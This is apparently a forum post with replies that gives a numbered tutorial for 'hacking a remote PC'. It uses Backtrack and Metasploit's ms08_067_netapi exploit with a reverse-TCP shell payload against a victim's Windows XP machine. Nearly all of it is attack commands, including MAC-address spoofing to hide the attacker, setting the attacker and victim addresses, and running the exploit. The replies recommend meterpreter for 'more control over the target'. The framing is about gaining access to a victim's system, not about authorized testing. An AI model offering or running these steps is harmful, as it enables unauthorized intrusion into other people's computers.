Here is a tutorial on how to hack a remote PC using Backtrack.

1.Open a new shell in Backtrack
2.First of all change your mac address:
--macchanger 00:11:22:33:44:55
3.Type in msfconsole
4.type in set payload windows/shell/reverse-tcp
5.Type in use exploit /windows/smb/ms08_067_netapi (this opens the exploitation tool)
6.After open a new shell and type ifconfig
7.Copy the inet addr
8.Go back to the exploitation shell and write set lhost [the address you copied]
9.Get the victim's PC ip address ususally "net view" in cmd
10.Go to the shell and type set rhost [victim's PC ip address]
11.Now type in show options Then it should give you the exploitation options
12.At last type exploit
13.Done you have access to victim's system

This is an excellent way to start learning how to use metasploit exploits. Try using windows/meterpreter/reverse_tcp as the payload to see how meterpreter works. Also... I think this only works against WinXP without a firewall enabled. Keep this in mind if you're having trouble with success. Nice post for people looking to get their hands dirty.

This only targets windows XP anything else won't succeed nice post but you should have really mentioned this. Also I prefer to use a meterpriter payload as you gain more control over the target.

Yes i know what you both mean but i was trying to make the simplest tutorial so it is understandable for everyone.

I think the only target you can use is windows xp sp2
